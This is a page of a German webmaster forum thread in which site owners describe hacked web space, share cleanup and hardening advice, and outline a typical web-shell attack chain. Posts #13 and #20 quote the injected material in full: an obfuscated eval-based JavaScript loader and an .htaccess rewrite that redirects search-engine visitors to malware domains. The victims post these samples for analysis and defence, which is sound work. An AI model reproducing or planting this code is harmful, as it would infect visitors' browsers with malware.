Seite 2 von 3 ErsteErste 123 LetzteLetzte
Ergebnis 11 bis 20 von 26

Thema: Hack von Webseiten

  1. #11
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Deep Down Oberfranken
    Beiträge
    2.939

    Standard

    Zitat Zitat von carsten.gentsch Beitrag anzeigen
    was macht bitte diese Datei,
    Testet, ob es möglich ist
    • einen Daemon zu starten und auf Port 36000 zu binden
    • DNS-Auflösung bzw. DNS-Connect zu bekommen
    • einen SMTP-Server zu connecten

    Zitat Zitat von carsten.gentsch Beitrag anzeigen
    wie kann sowas dahin kommen? Benutzer und Gruppe 1273/1273
    Durch Upload?
    Wem gehört denn das cgi-bin-Verzeichnis? Und welche Rechte sind da gesetzt?
    Zitat Zitat von carsten.gentsch Beitrag anzeigen
    und wie kann es sein das mein Provider ncihts mekr davon?
    Wie sollte er das merken?
    Wenn das regulär über (s)FTP, SCP, ... hochgeladen wurde ist das für den Provider erstmal kein Problem, da ja anscheinend die Zugangsdaten korrekt waren. ich würde zunächst das Passwort ändern, wenn möglich auf SSH/SCP mit shared key auth umstellen.
    Wenn das über ein fehlerhaftes Script (CMS, Blog, whatever) hochgeladen wurde, dann hat wohl eher der Seitenbetreiber als der Provider schuld. Der Provider könnte aber helfen, wenn er die Logfiles auf Spuren des Uploads durchsucht.

    Ach ja, evtl auch das Script in dieser Form ma irgendwo sichern und alles ab 'print "System info\n";' durch ein 'print "FUCK YOU!"' ersetzen

    Sarkasmus. Weil es illegal ist, dumme Leute zu schlagen.

  2. #12
    Mitglied Avatar von carsten.gentsch
    Registriert seit
    22.04.2008
    Ort
    immer und überall
    Beiträge
    946

    Standard Skript

    Hallo das Sckript lag in einem Webverzeichniss also als web tralala usw. kein Server bzw Vserver da hinter. Ich habe meien Provider angefragt auch wegen der letzten Hacks was in den Logfiles steht bisher schweigen im Walde und keine Antworten auf meine Fragen. PW und Zugänge sind alle neugesetzt und es sind keine FTP Benutzer angelegt.
    Ich kann über meine Logfiles ncihts sehen was darauf hindeuten würde, da ich die Server Logs nicht einsehen kann.
    Nur ist mir die Datei nie aufgefallen da ich öfter rein schaue und nachsehe ob sich was geändert hat.
    Das Verzeicniss hat die Rechte 444 und vroher auch schon gehabt. Wer es wie uploaden konnte müsste mein provider sehen können aber selbst nach dem letzten Hack und meinen Hinweisen darauf höre ich ncihts von Ihm.
    Komisch ist das wenn es ein Trojaner wäre würden doch alle meine FTPS betroffen sein ist aber nur dieser. Und was spielt dabei die Deutsche IP für eine rolle?

    Fragen über Fragen und ich warte noch auf die Antworten meinen Provoders.
    Gotsei gedanke läuft auf meinem Vserver weder FTP noch ssh noch Postfix

  3. #13
    Neues Mitglied
    Registriert seit
    29.07.2012
    Beiträge
    7

    Standard

    Ein Hack dieser Art ist mir auch passiert: viele meiner html-Seiten enthalten nun so ein Script, das gleich nach dem Body-Tag eingefügt wurde. Der Angriff wurde am 21.7. vormittags durchgeführt. Auch am 26.6. nachts wurden einige Seiten neu geschrieben - ich kann da aber kein solches Script finden. Was habt ihr in diesen Fällen unternommen? Mal abgesehen von der Änderung der Paßwörter für Plesk und FTP, und Wiederherstellen der alten Seiten?
    Ein Beispiel für das Script, wie ich es vorfand:
    <!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
    if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,1 04,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,8 8,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,10 0,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94, 101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95, 97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,1 02,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;288-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
    if(x&&f&&012===10)e(s);</script><!--/c3284d-->

  4. #14
    Mitglied
    Registriert seit
    17.10.2011
    Beiträge
    85

    Standard

    Vorab: So etwas ist kein Spass.

    Es muss fuer den Webserver Logfiles über den Apache-Zugriff geben (access_log und error_log). Schau nach welchen welche Zeit im Filesystem die betreffende Datei hat. Dann schaue in den Minuten vor/nach dieser Uhrzeit in den Logfiles nach welche Daten abgerufen wurden. Nicht nur cgi-bin ist wichtig, das kann genauso gut ein nicht sicheres PHP Script oder ähnliches sein.

    Ansonsten: Ein ordentlicher Webserver sollte immer Filterregeln haben welche das ansprechen von anderen Diensten als den vorgesehen von aussen gar nicht erst erlaubt. So etwas ist bei Massenhostern zwar komplett unüblich, sollte auf ernsten Webservern aber eine Selbstverständlichkeit sein. Das verhindert zwar keine Attacke, aber reduziert zumindest erheblich die Missbrauchsgefahr nach einem erfolgten Einbruch. Dass ein Einbruch erfolgt ist scheint mit nach Euren Beispielen sicher.

  5. #15
    Mitglied
    Registriert seit
    17.10.2011
    Beiträge
    85

    Standard

    Falls der Angriff/Zugriff per ftp erfolgt ist (ich habe erst jetzt den gesamten Thread noch mal gelesen, sieht ja danach aus) - zum Beispiel bei proftpd kann man natürlich die IP-Ranges genau definieren von denen aus ein Zugriff überhaupt zugelassen werden soll. Es gibt auch ein Modul um externe RBLs zu nutzen. Wer nicht über eine statische IP verfügt der sucht sich halt behelfsweise die von seinem ISP genutzten Netzblöcke heraus und lässt nur diese zu. FTP sollte man prinzipiell nicht fuer 0/0 (allewelt) zulassen.

  6. #16
    ### nicht streicheln ### Avatar von Nebelwolf †
    Registriert seit
    17.07.2005
    Ort
    Köln/Bonn/Rhein-Sieg
    Beiträge
    3.695

    Standard

    Hallo Bernhard,

    ich gehe davon aus, daß ein Trojaner FTP-Zugangsdaten gesammelt hat und diese jetzt per Script nutzt um bösartigen Code einzuschleusen. Der betroffene Account verwaltete zwei unabhängige Websites aus reinem HTML, die beide betroffen waren. Ich habe alle FTP-Zugänge bis auf einen gelöscht und dort ein neues Paßwort vergeben.

    Nebelwolf

  7. #17
    Anfänger
    Registriert seit
    12.08.2008
    Ort
    Rheinbach
    Beiträge
    1.492

    Standard

    In der Regel laufen diese Attacken immer nach dem gleichen Schema ab:

    1) Angreifbares Skript finden. Das sind meist PHP-Formulare, manchmal in Zusammenspiel mit einer Datenbank.
    2) Über die Lücke von 1) eine Datei auf den Server laden. Dies ist meist ein kleines Skript, oft auch in PHP geschrieben, dass, je nach Konfiguration des Webservers mehr oder weniger Unfug ermöglicht. Die Funktionen dieses Skripts reichen von einem einfachen Eingabefeld, dass dann mittels "system()" ausgeführt wird bis hin zu kompletten interaktiven Shells. (Sehr beeindruckend so etwas zu sehen)
    3) 1)+2) laufen oftmals komplett automatisiert, ab jetzt kommt meist ein Mensch ins Spiel. Dieser hat nun verschiedene Möglichkeiten:
    a) Datendiebstahl der Daten vom Webserver und Datenbank. Geht (fast immer) problemlos, etwaige Passwörter die dort liegen sind daher in der Regel kompromittiert.
    b) Verbreitung von Malware: Dazu werden kleine Javaskripte, manipulierte Bilddaten oder anderes in die Webseiten eingefügt. Jeder, der die Seite in Zukunft besucht wird damit, je nach Browser mehr oder weniger erfolgreich ein Mitglied eines Botnetzes.
    c) Versand vom Spam-Mails.
    d) Verbreitung von Raubkopien oder Hosten von ganzen illegalen Seiten (gerne bei Seiten, die verwaist sind)
    e) Einfügen von Links, um Pagerank irgendwelcher Spam-Seiten zu verbessern.
    f) Erweiterung der Zugriffsrechte. Das Skript von 2) läuft standardmäßig mit den mehr oder weniger eingeschränkten Rechten des Webservers. Bei unsicherer Konfiguration kann man aber bis auf Root-Rechte kommen. Damit kann man dann auch z.B. eigene FTP-Server, Torrent-Tracker/-Seeder, Bitcoin-Server oder ähnliches aufsetzen.


    Falls ihr euch fragt, woher ich das weiß: Nachdem eine Coppermine-Gallerie von mir mal ein paar seltsame Dateien enthalten hatte und mir Google eine Mail schrieb (Falls der Google-Bot auf Malware stößt, wird der Betreiber der Webseite automatisch informiert), habe ich mir mal Zeit genommen, und diese Dateien komplett zerlegt und auch etwas Hintergrundrecherche betrieben.

  8. #18
    Mitglied Avatar von carsten.gentsch
    Registriert seit
    22.04.2008
    Ort
    immer und überall
    Beiträge
    946

    Standard

    Hallo
    nach dem Angriff bei mir schaue ich jeden Tag nach ob Dateien verändert wurden. Zumindest wo ich es sehen kann. Bei der einen Geschichte warte ich immer ncoh was mein Provider sagt wie sowas passieren konnte und was die Logfiles aussagen dazu. Bisher schweigen im Walde, was ich festgestellt habe das nur 1 FTP Zugang betroffen war, was einen Trojaner ausschließen dürfte auf dem PC und nach dem ich alle PWs geändert und FTP benutzer gelöscht habe ist erstmal ruhe.
    Da ich viel mit WP und Joomla arbeite schaue ich dort fast jeden Tag nach und habe gerade was WP angeht gute Module am laufen die jede veränderung von Dateien per Email melden auch Zugriffe.
    Wordfence found the following new issues on "... der Blog".Critical Problems:* The Plugin "BackWPup" needs an upgrade.
    Also ist aktualität der Anwendungen immer gefragt und ein muss.
    Nur weiss ich auch bis her icht wie das ganze passieren konnte. Und auf welchem Wege das gelang da man als Kunde ja beschränkte möglichlkeiten hat an Logs zu kommen. Zudem blocke ich alle CGI Skripte da die oftmals nicht benötigt werden.

    Gruß
    Geändert von carsten.gentsch (29.07.2012 um 13:56 Uhr)

  9. #19
    Neues Mitglied
    Registriert seit
    29.07.2012
    Beiträge
    7

    Standard

    Danke für Eure Hinweise.
    Ich bin nicht der Admin des Servers, es ist ein günstiges WebSpace-Angebot mit aspx (letzteres benötge ich, die aspx-Seiten scheinen unverändert zu sein; der Server ist also IIS). PHP verwende ich nicht, wird aber prinzipiell bereitgestellt. Andere Nutzer des Servers könnten also php verwenden. Ich vermute mal, daß der FTP-Server von Microsoft ist. Ich konnte mit FileZilla zugreifen, von sftp oder so wüßte ich momentan nicht. Das Paßwort für Plesk konnte ich ändern, aber das für FTP habe ich nirgends gefunden, habe nun den Provider informiert.
    Die Logfiles zum Webseitenzugriff waren zum fraglichen Zeitpunkt sauber - Upload über FTP wird da meines Wissens nicht mitgeschrieben.
    Laut Google-Hinweisen ( [Link nur für registrierte Mitglieder sichtbar. ]) wurde aber bereits vor dem 21.7. "verdächtiger Content" gefunden.
    Da mein Rechner während der Analysen plötzlich mit Festplattengeratter einfror, läuft gerade desinfect von c't drüber. Ich habe ihn härtestens abgeschaltet (Steckdosenleiste). Hoffentlich kein Zeus...

  10. #20
    Neues Mitglied
    Registriert seit
    29.07.2012
    Beiträge
    7

    Standard

    ... und auch .htaccess hat der Hacker neu geschrieben:
    #c3284d#
    <IfModule mod_rewrite.c>

    RewriteEngine On

    RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|allt heuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|bai du|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|bro wseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead| excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findlo o|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|ga laxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hisp avista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe| km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|loo kle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape| netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp |qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|st artpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchna se|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanado o|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya |yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

    RewriteRule ^(.*)$ http://lundf-creation.de/main.php [R=301,L]

    </IfModule>
    #/c3284d#
    Redirect 301 / http://dresen.co.cc/in.cgi?9
    "lundf-creation.de" findet sich übrigens auch nach Decodierung des eigenartigen Scripts, das ich oben gemeldet habe. Laut Googel gibt's dort infektiöse Malware.

Seite 2 von 3 ErsteErste 123 LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen